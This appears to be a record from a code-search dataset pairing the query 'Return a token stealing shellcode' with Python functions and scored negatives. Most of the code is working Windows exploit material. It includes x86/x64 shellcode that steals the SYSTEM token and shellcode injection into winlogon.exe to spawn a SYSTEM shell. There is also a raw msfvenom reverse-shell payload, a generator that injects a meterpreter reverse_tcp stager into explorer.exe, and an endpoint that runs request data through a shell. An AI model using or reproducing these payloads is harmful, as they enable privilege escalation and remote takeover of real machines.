\"\\x51\\x68\\x45\\x78\\x65\\x63\\x68\\x41\\x57\\x69\\x6e\\x89\\xe1\\x8d\\x49\"\n \"\\x01\\x51\\x53\\xff\\xd6\\x87\\xfa\\x89\\xc7\\x31\\xc9\\x51\\x68\\x72\\x65\"\n \"\\x61\\x64\\x68\\x69\\x74\\x54\\x68\\x68\\x41\\x41\\x45\\x78\\x89\\xe1\\x8d\"\n \"\\x49\\x02\\x51\\x53\\xff\\xd6\\x89\\xc6\\x31\\xc9\\x51\\x68\\x65\\x78\\x65\"\n \"\\x20\\x68\\x63\\x6d\\x64\\x2e\\x89\\xe1\\x6a\\x01\\x51\\xff\\xd7\\x31\\xc9\"\n \"\\x51\\xff\\xd6\"\n )\n\n sh = create_string_buffer(SHELLCODE, len(SHELLCODE))\n code_size = len(SHELLCODE) \n \n # Allocate some space for the shellcode (in the program memory)\n sh_address = kernel32.VirtualAllocEx(hProcess, 0, code_size, VIRTUAL_MEM, \n PAGE_EXECUTE_READWRITE)\n if not sh_address:\n debug_print(\"\\t[-] Could not allocate shellcode in the remote process\")\n getLastError()\n sys.exit()\n \n debug_print(\"\\t[+] Allocated memory at address 0x%x\" % sh_address)\n\n # Inject 
shellcode in to winlogon.exe process space\n written = LPVOID(0)\n shellcode = DWORD(sh_address)\n dwStatus = kernel32.WriteProcessMemory(hProcess, shellcode, sh, code_size, \n byref(written))\n if not dwStatus:\n debug_print(\"\\t[-] Could not write shellcode into winlogon.exe\")\n getLastError()\n sys.exit()\n \n debug_print(\"\\t[+] Injected %d bytes of shellcode to 0x%x\" % (written.value, sh_address))\n\n # Now we create the remote thread and point its entry routine to be head of \n # our shellcode\n thread_id = HANDLE(0)\n if not kernel32.CreateRemoteThread(hProcess, 0, 0, sh_address, 0, 0, \n byref(thread_id)):\n debug_print(\"\\t[-] Failed to inject shellcode into winlogon.exe\")\n getLastError()\n sys.exit()\n\n debug_print(\"\\t[+] Remote thread 0x%x created\" % thread_id.value)\n debug_print(\"\\t[+] Spawning SYSTEM shell...\")\n # Kill python process to kill the window and avoid BSODs\n #os.kill(os.getpid(), signal.SIGABRT)\n\n debug_print(\"\\n\\t\\t[*] Remote thread created with a thread ID of: [%x]\" % thread_id.value)\n debug_print(\"\\t\\t[+] ***BOOM!!\")", "def processJumpTable(jt_ea):", "def process_python(data, code):\n\tx=data\n\treturn eval(code)", "def rts_code_ptr(runtime_addr, runtime_addr_high=None):\n return code_ptr(runtime_addr, runtime_addr_high, offset=1)", "def getJumpTablesFromFunc(func_ea):", "def leak_shellcode(remote, shellcode):\n assert len(shellcode) == 3\n alloc_addr = get_current_allocation_addr(remote)\n send_receive(remote, '\\x93' + shellcode) # Start with xchg eax, ebx to leak us\n return alloc_addr + 6" ]
[ "0.60174304", "0.5950094", "0.56463164", "0.5519387", "0.5371425", "0.5347842", "0.5253339", "0.5197456", "0.516168", "0.5138188", "0.5085005", "0.5085005", "0.50311166", "0.4988512", "0.48932365", "0.48901132", "0.48380888", "0.48293492", "0.48163736", "0.48154366", "0.47775632", "0.47692195", "0.47690675", "0.47599098", "0.4745956", "0.47396538", "0.47364864", "0.47323087", "0.4731965", "0.4730474" ]
0.6675145
0
Return a token restore shellcode related to the platform
def restoretokenx86(RETVAL, extra = ""):
    (KPROCESS,APLINKS,UPID,TOKEN) = setosvariablesx86()
    shellcode = (
    "\x52"                                      # push  edx
    "\x33\xc0"                                  # xor   eax,eax
    "\x64\x8b\x80\x24\x01\x00\x00"              # mov   eax,DWORD PTR fs:[eax+0x124]
    "\x8b\x40" + KPROCESS +                     # mov   eax,DWORD PTR [eax+_KPROCESS]
    "\x8b\x15\x00\x09\x02\x00"                  # mov   edx,DWORD PTR ds:0x20900 ;saved token
    "\x89\x90" + TOKEN + "\x00\x00\x00"         # mov   DWORD PTR [eax+_TOKEN],edx ;restore token
    "\x5a"                                      # pop   edx
    )

    if RETVAL == "":
        shellcode += "\xc3"                     # retn
    else:
        shellcode += "\xc2" + RETVAL + "\x00"   # ret   0x8

    return shellcode
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def tokenstealingx64(RETVAL, extra = \"\"):\n\t(KPROCESS,FLINK,UPID,TOKEN) = setosvariablesx64()\n\tshellcode = (\n\t\"\\x65\\x48\\x8b\\x04\\x25\\x88\\x01\\x00\\x00\"\t\t# mov rax, [gs:0x188] ;Get current ETHREAD in\n\t\"\\x48\\x8b\\x40\" + KPROCESS +\t\t\t\t\t# mov rax, [rax+0x68] ;Get current KPROCESS address\n\t\"\\x48\\x89\\xc1\"\t\t\t\t\t\t\t\t# mov rcx, rax ;Copy current KPROCESS address to RCX\n\t\"\\x48\\x8b\\x80\" + FLINK + \"\\x00\\x00\"\t\t\t# mov rax, [rax+0xe0] ;Next KPROCESS ActivKPROCESSLinks.Flink\n\t\"\\x48\\x2d\" + FLINK + \"\\x00\\x00\"\t\t\t\t# sub rax, 0xe0 ;Go to the beginning of the KPROCESS structure\n\t\"\\x4c\\x8b\\x88\" + UPID + \"\\x00\\x00\"\t\t\t# mov r9 , [rax+0xd8] ;Copy PID to R9\n\t\"\\x49\\x83\\xf9\\x04\"\t\t\t\t\t\t\t# cmp r9 , 0x4 ;Compare R9 to SYSTEM PID (=4)\n\t\"\\x75\\xe6\"\t\t\t\t\t\t\t\t\t# jnz short find_system_process ;If not SYSTEM got to next KPROCESS\n\t\"\\x48\\x8b\\x90\" + TOKEN + \"\\x00\\x00\"\t\t\t# mov rdx, [rax+0x160] ;Copy SYSTEM process token address to RDX\n\t\"\\x48\\x89\\x91\" + TOKEN + \"\\x00\\x00\"\t\t\t# mov [rcx+0x160], rdx ;Steal token with overwriting our current process's token address\n\t)\n\t\n\tshellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack\n\n\tif RETVAL == \"\":\n\t\tshellcode += \"\\xc3\"\t\t\t\t\t\t#retn\n\telse:\n\t\tshellcode += \"\\xc2\" + RETVAL + \"\\x00\"\t# ret\t0x8\t\n\t\n\treturn shellcode", "def tokenstealingx86(RETVAL, extra = \"\"):\n\t(KPROCESS,APLINKS,UPID,TOKEN) = setosvariablesx86()\n\tshellcode = (\n\t\"\\x60\"\t\t\t\t\t\t\t\t\t\t# pushad\n\t\"\\x33\\xc0\"\t\t\t\t\t\t\t\t\t# xor\teax,eax\n\t\"\\x64\\x8b\\x80\\x24\\x01\\x00\\x00\"\t\t\t\t# mov\teax,DWORD PTR fs:[eax+0x124]\n\t\"\\x8b\\x40\" + KPROCESS +\t\t\t\t\t\t# mov\teax,DWORD PTR [eax+_KPROCESS]\n\t\"\\x8b\\xc8\"\t\t\t\t\t\t\t\t\t# mov\tecx,eax\n\t\"\\x8b\\x80\" + APLINKS + \"\\x00\\x00\\x00\"\t\t# mov\teax,DWORD PTR [eax+0xb8]\n\t\"\\x2d\" + APLINKS + \"\\x00\\x00\\x00\"\t\t\t# sub\teax,0xb8\n\t\"\\x83\\xb8\" + UPID + \"\\x00\\x00\\x00\\x04\"\t\t# cmp\tDWORD PTR [eax+0xb4],0x4\n\t\"\\x75\\xec\"\t\t\t\t\t\t\t\t\t# jne\t0xe\n\t\"\\x8b\\x90\" + TOKEN + \"\\x00\\x00\\x00\"\t\t\t# mov\tedx,DWORD PTR [eax+0xf8]\n\t\"\\x89\\x91\" + TOKEN + \"\\x00\\x00\\x00\"\t\t\t# mov\tDWORD PTR [ecx+0xf8],edx\n\t\"\\x61\"\t\t\t\t\t\t\t\t\t\t# popad\n\t)\n\t\n\tshellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack\n\t\n\tif RETVAL == \"\":\n\t\tshellcode += \"\\xc3\"\t\t\t\t\t\t#retn\n\telse:\n\t\tshellcode += \"\\xc2\" + RETVAL + \"\\x00\"\t# ret\t0x8\t\n\t\n\treturn shellcode", "def _ret_shellcode_buffer():\n\n shellcode = bytearray(\n #---[Debug]\n \"\\xCC\"\n #---[Setup]\n \"\\x60\" # pushad\n \"\\x64\\xA1\\x24\\x01\\x00\\x00\" \t # mov eax, fs:[KTHREAD_OFFSET]\n \"\\x8B\\x40\\x50\" # mov eax, [eax + EPROCESS_OFFSET]\n \"\\x89\\xC1\" # mov ecx, eax (Current _EPROCESS structure)\n \"\\x8B\\x98\\xF8\\x00\\x00\\x00\" \t # mov ebx, [eax + TOKEN_OFFSET]\n #---[Copy System PID token]\n \"\\xBA\\x04\\x00\\x00\\x00\" # mov edx, 4 (SYSTEM PID)\n \"\\x8B\\x80\\xB8\\x00\\x00\\x00\" # mov eax, [eax + FLINK_OFFSET] <-|\n \"\\x2D\\xB8\\x00\\x00\\x00\" # sub eax, FLINK_OFFSET |\n \"\\x39\\x90\\xB4\\x00\\x00\\x00\" # cmp [eax + PID_OFFSET], edx |\n \"\\x75\\xED\" # jnz ->|\n \"\\x8B\\x90\\xF8\\x00\\x00\\x00\" # mov edx, [eax + TOKEN_OFFSET]\n \"\\x89\\x91\\xF8\\x00\\x00\\x00\" # mov [ecx + TOKEN_OFFSET], edx\n #---[Recover]\n \"\\x61\" # popad\t\t\n \"\\xC3\" # ret\n )\n\n MEM_COMMIT_MEM_RESERVE 
= 0x3000\n PAGE_EXECUTE_READWRITE = 0x40\n\t\n ptr = kernel32.VirtualAlloc(\n c_int(0), # lpAddress\n c_int(len(shellcode)), # dwSize\n c_int(MEM_COMMIT_MEM_RESERVE), # flAllocationType\n c_int(PAGE_EXECUTE_READWRITE) # flProtect\n )\n \n shellcode_ptr = (c_char * len(shellcode)).from_buffer(shellcode)\n\n kernel32.RtlMoveMemory(\n c_int(ptr),\n shellcode_ptr,\n c_int(len(shellcode))\n )\n \n return ptr, len(shellcode)", "def add_shellcode() -> bytes:\n # msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread lhost=eth0 lport=4444 \n # -f c -b \"\\x00\\x20\\x25\\x2b\\x2f\\x5c\"\n #Payload size: 351 bytes\n shellcode = b\"\"\n shellcode += b\"\\xba\\x6e\\x70\\x53\\xc6\\xdb\\xc4\\xd9\\x74\\x24\\xf4\\x5e\\x31\\xc9\\xb1\"\n shellcode += b\"\\x52\\x31\\x56\\x12\\x03\\x56\\x12\\x83\\xa8\\x74\\xb1\\x33\\xc8\\x9d\\xb7\"\n shellcode += b\"\\xbc\\x30\\x5e\\xd8\\x35\\xd5\\x6f\\xd8\\x22\\x9e\\xc0\\xe8\\x21\\xf2\\xec\"\n shellcode += b\"\\x83\\x64\\xe6\\x67\\xe1\\xa0\\x09\\xcf\\x4c\\x97\\x24\\xd0\\xfd\\xeb\\x27\"\n shellcode += b\"\\x52\\xfc\\x3f\\x87\\x6b\\xcf\\x4d\\xc6\\xac\\x32\\xbf\\x9a\\x65\\x38\\x12\"\n shellcode += b\"\\x0a\\x01\\x74\\xaf\\xa1\\x59\\x98\\xb7\\x56\\x29\\x9b\\x96\\xc9\\x21\\xc2\"\n shellcode += b\"\\x38\\xe8\\xe6\\x7e\\x71\\xf2\\xeb\\xbb\\xcb\\x89\\xd8\\x30\\xca\\x5b\\x11\"\n shellcode += b\"\\xb8\\x61\\xa2\\x9d\\x4b\\x7b\\xe3\\x1a\\xb4\\x0e\\x1d\\x59\\x49\\x09\\xda\"\n shellcode += b\"\\x23\\x95\\x9c\\xf8\\x84\\x5e\\x06\\x24\\x34\\xb2\\xd1\\xaf\\x3a\\x7f\\x95\"\n shellcode += b\"\\xf7\\x5e\\x7e\\x7a\\x8c\\x5b\\x0b\\x7d\\x42\\xea\\x4f\\x5a\\x46\\xb6\\x14\"\n shellcode += b\"\\xc3\\xdf\\x12\\xfa\\xfc\\x3f\\xfd\\xa3\\x58\\x34\\x10\\xb7\\xd0\\x17\\x7d\"\n shellcode += b\"\\x74\\xd9\\xa7\\x7d\\x12\\x6a\\xd4\\x4f\\xbd\\xc0\\x72\\xfc\\x36\\xcf\\x85\"\n shellcode += b\"\\x03\\x6d\\xb7\\x19\\xfa\\x8e\\xc8\\x30\\x39\\xda\\x98\\x2a\\xe8\\x63\\x73\"\n shellcode += b\"\\xaa\\x15\\xb6\\xd4\\xfa\\xb9\\x69\\x95\\xaa\\x79\\xda\\x7d\\xa0\\x75\\x05\"\n shellcode += b\"\\x9d\\xcb\\x5f\\x2e\\x34\\x36\\x08\\x91\\x61\\x5b\\xab\\x79\\x70\\x9b\\x3a\"\n shellcode += b\"\\x26\\xfd\\x7d\\x56\\xc6\\xab\\xd6\\xcf\\x7f\\xf6\\xac\\x6e\\x7f\\x2c\\xc9\"\n shellcode += b\"\\xb1\\x0b\\xc3\\x2e\\x7f\\xfc\\xae\\x3c\\xe8\\x0c\\xe5\\x1e\\xbf\\x13\\xd3\"\n shellcode += b\"\\x36\\x23\\x81\\xb8\\xc6\\x2a\\xba\\x16\\x91\\x7b\\x0c\\x6f\\x77\\x96\\x37\"\n shellcode += b\"\\xd9\\x65\\x6b\\xa1\\x22\\x2d\\xb0\\x12\\xac\\xac\\x35\\x2e\\x8a\\xbe\\x83\"\n shellcode += b\"\\xaf\\x96\\xea\\x5b\\xe6\\x40\\x44\\x1a\\x50\\x23\\x3e\\xf4\\x0f\\xed\\xd6\"\n shellcode += b\"\\x81\\x63\\x2e\\xa0\\x8d\\xa9\\xd8\\x4c\\x3f\\x04\\x9d\\x73\\xf0\\xc0\\x29\"\n shellcode += b\"\\x0c\\xec\\x70\\xd5\\xc7\\xb4\\x91\\x34\\xcd\\xc0\\x39\\xe1\\x84\\x68\\x24\"\n shellcode += b\"\\x12\\x73\\xae\\x51\\x91\\x71\\x4f\\xa6\\x89\\xf0\\x4a\\xe2\\x0d\\xe9\\x26\"\n shellcode += b\"\\x7b\\xf8\\x0d\\x94\\x7c\\x29\"\n return shellcode", "def get(self):\r\n # Update of 0.3.6\r\n # Some custom shells will not need TARGET and PORT strings.\r\n # To deal with that, I will just try to find them in the string first.\r\n if \"TARGET\" in self.code and \"PORT\" in self.code:\r\n self.code = str(self.code.replace(\"TARGET\", self.host)).replace(\"PORT\", str(self.port))\r\n else:\r\n # Custom shell. 
Here we need to program individually based in specifics.\r\n if \"bloodseeker\" in self.name.lower(): # This is for Bloodseeker project.\r\n \r\n # This one requires a stager.\r\n if self.args.stager is None:\r\n print(error(\"This payload REQUIRES --stager flag.\"))\r\n exit(1)\r\n \r\n print(info(\"Generating shellcode ...\"))\r\n malicious_script = str(WINDOWS_BLOODSEEKER_SCRIPT.decode(\"base64\")).replace(\"SHELLCODEHERE\", shellcode_to_ps1(\"windows/x64/meterpreter/reverse_tcp\", self.args.host, self.args.port))\r\n self.code = malicious_script.replace(\"PROCESSNAME\", \"explorer\") # we want inject into explorer.exe\r\n print(alert(\"Make sure you have a handler for windows/x64/meterpreter/reverse_tcp listening in your machine.\"))\r\n print(alert(\"It is recommended to use the --base64 flag.\"))\r\n return self.code # we dont need encoder in this one.\r\n else:\r\n print(error(\"No custom shell procedure was arranged for this shell. This is fatal.\"))\r\n exit(1)\r\n\r\n \r\n # Apply xor encoding.\r\n self.code = self.code if self.args.xor is 0 else xor_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply base64 encoding.\r\n self.code = base64_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply URL-encoding\r\n if self.args.urlencode is True and self.args.stager is None:\r\n self.code = to_urlencode(self.code)\r\n \r\n return self.code", "def decode_generated_root_token(encoded_token, otp):\n command = [\"vault\"]\n if vault_version_ge(\"0.9.6\"):\n # before Vault ~0.9.6, the generate-root command was the first positional argument\n # afterwards, it was moved under the \"operator\" category\n command.append(\"operator\")\n\n command.extend(\n [\n \"generate-root\",\n \"-address\",\n \"https://127.0.0.1:8200\",\n \"-tls-skip-verify\",\n \"-decode\",\n encoded_token,\n \"-otp\",\n otp,\n ]\n )\n process = subprocess.Popen(\n **get_popen_kwargs(args=command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n )\n\n stdout, stderr = process.communicate()\n logging.debug('decode_generated_root_token stdout: \"%s\"' % str(stdout))\n if stderr != \"\":\n logging.error(\"decode_generated_root_token stderr: %s\" % stderr)\n\n try:\n # On the off chance VAULT_FORMAT=json or such is set in the test environment:\n new_token = json.loads(stdout)[\"token\"]\n except ValueError:\n new_token = stdout.replace(\"Root token:\", \"\")\n new_token = new_token.strip()\n return new_token", "def getToken():\n token = getenv(TOKEN_NAME)\n if token == None:\n raise SystemExit('No token found. 
Use env variable %s' % TOKEN_NAME)\n return token", "def get_code(self):\n self._payload_to_str()\n return self._str_payload", "def read_code() -> str:\n code = ''\n if settings.ZULIP_ENABLED:\n _code = zulip_read()\n if _code:\n logger.info(f'Read SMS Code from Zulip: {_code}')\n code = _code\n\n return code", "def get_code(self):\n return self.code", "def get_code(self):\n return self.code", "def get_code(self):\n return self.code", "def get_code(self):\n return self.code", "def read_idcode(device):\n data = bytearray()\n data.extend((WRITE_BITS_TMS_NVE, 4, 0b11111)) # go to reset\n data.extend((WRITE_BITS_TMS_NVE, 3, 0b0010)) # go to shift-dr\n data.extend((READ_BYTES_NVE_LSB, 3, 0)) # read command\n device.write(bytes(data)) # send off MPSSE commands\n return device.read(4)[::-1].hex(\"_\") # return IDCODE", "def step_impl(context):\n fields = {\n 'grant_type': 'authorization_code',\n 'code': context.code,\n 'client_id': context.vendor_config['versioned_auth']['client_id'],\n 'redirect_uri': context.vendor_config['versioned_auth']['redirect_uri'],\n }\n\n context.response = token_request(fields,\n context.vendor_config['versioned_auth'],\n context.conformance)", "def get_token(self, *args, **kwargs):\n if \"SHIB-ECP\" == self._auth_mode:\n return self._shib_get_token(*args, **kwargs)\n elif \"MAST-AUTH\" == self._auth_mode:\n return self._get_token(*args, **kwargs)\n else:\n raise Exception(\"Unknown MAST Auth mode %s\" % self._auth_mode)", "def step_impl(context):\n fields = {\n 'grant_type': 'authorization_code',\n 'code': context.code,\n 'client_id': context.vendor_config['versioned_auth']['client_id'],\n 'redirect_uri': context.vendor_config['versioned_auth']['redirect_uri'],\n }\n\n fields.update(dict(context.table))\n\n context.response = token_request(fields,\n context.vendor_config['versioned_auth'],\n context.conformance)", "def _get_code_command_linux():\n print('Use arrows (or \\'E\\', \\'S\\', \\'W\\',' +\\\n '\\'N\\' + a number) to move or \\'q\\' to give up.')\n return get_char_code.get()", "def token():\n return os.environ.get('TOKEN', None)", "def GetMachineKey():\n return platform.node()", "def get_token():\n return session.get('microsoft_token')", "def get_token():\n return session.get('microsoft_token')", "def token(command, hostname):\n communicator = ClickCallback()\n token_command().with_communicator(communicator).build().execute(command=command, hostname=hostname)", "def step_impl(context):\n fields = {\n 'grant_type': 'authorization_code',\n 'code': context.code,\n 'client_id': context.vendor_config['auth']['client_id'],\n 'redirect_uri': context.vendor_config['auth']['redirect_uri'],\n }\n\n context.response = token_request(fields,\n context.vendor_config['auth'],\n context.conformance)", "def _set_token(self):\n f = open(\".cli_token\")\n data = f.read()\n if data is not None:\n self.token = data\n return self.token", "def get_token(self, code):\n\n # live need post a form to get token\n headers = {'Content-type': 'application/x-www-form-urlencoded'}\n data = {\n 'client_id': get_config('login.live.client_id'),\n 'client_secret': get_config('login.live.client_secret'),\n 'redirect_uri': get_config('login.live.redirect_uri'),\n 'grant_type': 'authorization_code',\n 'code': code\n }\n # Following is use urllib to post request\n url = get_config('login.live.access_token_url')\n r = requests.post(url, data=data, headers=headers)\n resp = r.json()\n\n if resp.get(\"error\") is not None:\n raise Exception(resp)\n\n return resp[\"access_token\"]", "def 
read_idcode_opcode(device, idcode_opcode):\n opcode_length = len(idcode_opcode)\n data = bytearray()\n data.extend((WRITE_BITS_TMS_NVE, 4, 0b11111)) # go to reset\n data.extend((WRITE_BITS_TMS_NVE, 4, 0b00110)) # go to shift-ir\n data.extend((WRITE_BITS_NVE_LSB, opcode_length - 2, int(idcode_opcode))) # shift IDCODE opcode\n data.extend((WRITE_BITS_TMS_NVE, 4, 0b00111)) # go to shift-dr\n data.extend((READ_BYTES_NVE_LSB, 3, 0)) # read command\n device.write(bytes(data)) # send off MPSSE commands\n idcode = device.read(4)[::-1]\n return \"\".join(format(byte, \"08b\") for byte in idcode)", "def step_impl(context):\n fields = {\n 'grant_type': 'authorization_code',\n 'code': context.code,\n 'client_id': context.vendor_config['auth']['client_id'],\n 'redirect_uri': context.vendor_config['auth']['redirect_uri'],\n }\n\n fields.update(dict(context.table))\n\n context.response = token_request(fields,\n context.vendor_config['auth'],\n context.conformance)", "def get_token_from_rpx(self):\n url_params = {'token_url' : ''}\n http_response = urllib2.urlopen(RPX_POPUP_URL, urllib.urlencode(url_params))\n import pdb;pdb.set_trace()", "def run_code():\n\n output = None\n code = request.json['code']\n\n cmd = 'python -c \"' + code +'\"'\n p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE,\n stderr=STDOUT, close_fds=True)\n output = p.stdout.read()\n\n return jsonify(output.decode('utf-8'))" ]
[ "0.6424091", "0.6397666", "0.6127926", "0.6111997", "0.6069528", "0.5585783", "0.5481146", "0.5443435", "0.54214656", "0.5419342", "0.5419342", "0.5419342", "0.5419342", "0.5402531", "0.53439623", "0.53102636", "0.5277562", "0.52706194", "0.52654016", "0.5255049", "0.5221615", "0.5221615", "0.5198671", "0.5157412", "0.51517206", "0.51470906", "0.5147007", "0.51197046", "0.51157284", "0.51110613" ]
0.7274014
0
Return a token stealing shellcode related to the platform
def tokenstealingx86(RETVAL, extra = ""):
    (KPROCESS,APLINKS,UPID,TOKEN) = setosvariablesx86()
    shellcode = (
    "\x60"                                      # pushad
    "\x33\xc0"                                  # xor   eax,eax
    "\x64\x8b\x80\x24\x01\x00\x00"              # mov   eax,DWORD PTR fs:[eax+0x124]
    "\x8b\x40" + KPROCESS +                     # mov   eax,DWORD PTR [eax+_KPROCESS]
    "\x8b\xc8"                                  # mov   ecx,eax
    "\x8b\x80" + APLINKS + "\x00\x00\x00"       # mov   eax,DWORD PTR [eax+0xb8]
    "\x2d" + APLINKS + "\x00\x00\x00"           # sub   eax,0xb8
    "\x83\xb8" + UPID + "\x00\x00\x00\x04"      # cmp   DWORD PTR [eax+0xb4],0x4
    "\x75\xec"                                  # jne   0xe
    "\x8b\x90" + TOKEN + "\x00\x00\x00"         # mov   edx,DWORD PTR [eax+0xf8]
    "\x89\x91" + TOKEN + "\x00\x00\x00"         # mov   DWORD PTR [ecx+0xf8],edx
    "\x61"                                      # popad
    )

    shellcode += extra  # append extra code after token stealing shellcode, e.g.: restore stack

    if RETVAL == "":
        shellcode += "\xc3"                     # retn
    else:
        shellcode += "\xc2" + RETVAL + "\x00"   # ret   0x8

    return shellcode
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def tokenstealingx64(RETVAL, extra = \"\"):\n\t(KPROCESS,FLINK,UPID,TOKEN) = setosvariablesx64()\n\tshellcode = (\n\t\"\\x65\\x48\\x8b\\x04\\x25\\x88\\x01\\x00\\x00\"\t\t# mov rax, [gs:0x188] ;Get current ETHREAD in\n\t\"\\x48\\x8b\\x40\" + KPROCESS +\t\t\t\t\t# mov rax, [rax+0x68] ;Get current KPROCESS address\n\t\"\\x48\\x89\\xc1\"\t\t\t\t\t\t\t\t# mov rcx, rax ;Copy current KPROCESS address to RCX\n\t\"\\x48\\x8b\\x80\" + FLINK + \"\\x00\\x00\"\t\t\t# mov rax, [rax+0xe0] ;Next KPROCESS ActivKPROCESSLinks.Flink\n\t\"\\x48\\x2d\" + FLINK + \"\\x00\\x00\"\t\t\t\t# sub rax, 0xe0 ;Go to the beginning of the KPROCESS structure\n\t\"\\x4c\\x8b\\x88\" + UPID + \"\\x00\\x00\"\t\t\t# mov r9 , [rax+0xd8] ;Copy PID to R9\n\t\"\\x49\\x83\\xf9\\x04\"\t\t\t\t\t\t\t# cmp r9 , 0x4 ;Compare R9 to SYSTEM PID (=4)\n\t\"\\x75\\xe6\"\t\t\t\t\t\t\t\t\t# jnz short find_system_process ;If not SYSTEM got to next KPROCESS\n\t\"\\x48\\x8b\\x90\" + TOKEN + \"\\x00\\x00\"\t\t\t# mov rdx, [rax+0x160] ;Copy SYSTEM process token address to RDX\n\t\"\\x48\\x89\\x91\" + TOKEN + \"\\x00\\x00\"\t\t\t# mov [rcx+0x160], rdx ;Steal token with overwriting our current process's token address\n\t)\n\t\n\tshellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack\n\n\tif RETVAL == \"\":\n\t\tshellcode += \"\\xc3\"\t\t\t\t\t\t#retn\n\telse:\n\t\tshellcode += \"\\xc2\" + RETVAL + \"\\x00\"\t# ret\t0x8\t\n\t\n\treturn shellcode", "def restoretokenx86(RETVAL, extra = \"\"):\n\t(KPROCESS,APLINKS,UPID,TOKEN) = setosvariablesx86()\n\tshellcode = (\n\t\"\\x52\"\n\t\"\\x33\\xc0\"\t\t\t\t\t\t\t\t\t# xor\teax,eax\n\t\"\\x64\\x8b\\x80\\x24\\x01\\x00\\x00\"\t\t\t\t# mov\teax,DWORD PTR fs:[eax+0x124]\n\t\"\\x8b\\x40\" + KPROCESS +\t\t\t\t\t# mov\teax,DWORD PTR [eax+_KPROCESS]\n\t\"\\x8b\\x15\\x00\\x09\\x02\\x00\"\n\t\"\\x89\\x90\" + TOKEN + \"\\x00\\x00\\x00\"\t\t\t# mov\tedx,DWORD PTR [eax+0xf8]\n\t\"\\x5a\"\n\t)\n\t\n\tif RETVAL == \"\":\n\t\tshellcode += \"\\xc3\"\t\t\t\t\t\t#retn\n\telse:\n\t\tshellcode += \"\\xc2\" + RETVAL + \"\\x00\"\t# ret\t0x8\t\n\t\n\treturn shellcode", "def getToken():\n token = getenv(TOKEN_NAME)\n if token == None:\n raise SystemExit('No token found. 
Use env variable %s' % TOKEN_NAME)\n return token", "def _ret_shellcode_buffer():\n\n shellcode = bytearray(\n #---[Debug]\n \"\\xCC\"\n #---[Setup]\n \"\\x60\" # pushad\n \"\\x64\\xA1\\x24\\x01\\x00\\x00\" \t # mov eax, fs:[KTHREAD_OFFSET]\n \"\\x8B\\x40\\x50\" # mov eax, [eax + EPROCESS_OFFSET]\n \"\\x89\\xC1\" # mov ecx, eax (Current _EPROCESS structure)\n \"\\x8B\\x98\\xF8\\x00\\x00\\x00\" \t # mov ebx, [eax + TOKEN_OFFSET]\n #---[Copy System PID token]\n \"\\xBA\\x04\\x00\\x00\\x00\" # mov edx, 4 (SYSTEM PID)\n \"\\x8B\\x80\\xB8\\x00\\x00\\x00\" # mov eax, [eax + FLINK_OFFSET] <-|\n \"\\x2D\\xB8\\x00\\x00\\x00\" # sub eax, FLINK_OFFSET |\n \"\\x39\\x90\\xB4\\x00\\x00\\x00\" # cmp [eax + PID_OFFSET], edx |\n \"\\x75\\xED\" # jnz ->|\n \"\\x8B\\x90\\xF8\\x00\\x00\\x00\" # mov edx, [eax + TOKEN_OFFSET]\n \"\\x89\\x91\\xF8\\x00\\x00\\x00\" # mov [ecx + TOKEN_OFFSET], edx\n #---[Recover]\n \"\\x61\" # popad\t\t\n \"\\xC3\" # ret\n )\n\n MEM_COMMIT_MEM_RESERVE = 0x3000\n PAGE_EXECUTE_READWRITE = 0x40\n\t\n ptr = kernel32.VirtualAlloc(\n c_int(0), # lpAddress\n c_int(len(shellcode)), # dwSize\n c_int(MEM_COMMIT_MEM_RESERVE), # flAllocationType\n c_int(PAGE_EXECUTE_READWRITE) # flProtect\n )\n \n shellcode_ptr = (c_char * len(shellcode)).from_buffer(shellcode)\n\n kernel32.RtlMoveMemory(\n c_int(ptr),\n shellcode_ptr,\n c_int(len(shellcode))\n )\n \n return ptr, len(shellcode)", "def token():\n return os.environ.get('TOKEN', None)", "def token(command, hostname):\n communicator = ClickCallback()\n token_command().with_communicator(communicator).build().execute(command=command, hostname=hostname)", "def get(self):\r\n # Update of 0.3.6\r\n # Some custom shells will not need TARGET and PORT strings.\r\n # To deal with that, I will just try to find them in the string first.\r\n if \"TARGET\" in self.code and \"PORT\" in self.code:\r\n self.code = str(self.code.replace(\"TARGET\", self.host)).replace(\"PORT\", str(self.port))\r\n else:\r\n # Custom shell. Here we need to program individually based in specifics.\r\n if \"bloodseeker\" in self.name.lower(): # This is for Bloodseeker project.\r\n \r\n # This one requires a stager.\r\n if self.args.stager is None:\r\n print(error(\"This payload REQUIRES --stager flag.\"))\r\n exit(1)\r\n \r\n print(info(\"Generating shellcode ...\"))\r\n malicious_script = str(WINDOWS_BLOODSEEKER_SCRIPT.decode(\"base64\")).replace(\"SHELLCODEHERE\", shellcode_to_ps1(\"windows/x64/meterpreter/reverse_tcp\", self.args.host, self.args.port))\r\n self.code = malicious_script.replace(\"PROCESSNAME\", \"explorer\") # we want inject into explorer.exe\r\n print(alert(\"Make sure you have a handler for windows/x64/meterpreter/reverse_tcp listening in your machine.\"))\r\n print(alert(\"It is recommended to use the --base64 flag.\"))\r\n return self.code # we dont need encoder in this one.\r\n else:\r\n print(error(\"No custom shell procedure was arranged for this shell. 
This is fatal.\"))\r\n exit(1)\r\n\r\n \r\n # Apply xor encoding.\r\n self.code = self.code if self.args.xor is 0 else xor_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply base64 encoding.\r\n self.code = base64_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply URL-encoding\r\n if self.args.urlencode is True and self.args.stager is None:\r\n self.code = to_urlencode(self.code)\r\n \r\n return self.code", "def get_process_token():\n # Reference\n # https://gist.github.com/schlamar/7024668\n GetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess\n GetCurrentProcess.restype = wintypes.HANDLE\n OpenProcessToken = ctypes.windll.advapi32.OpenProcessToken\n OpenProcessToken.argtypes = (wintypes.HANDLE, wintypes.DWORD, ctypes.POINTER(wintypes.HANDLE))\n OpenProcessToken.restype = wintypes.BOOL\n token = wintypes.HANDLE()\n\n # 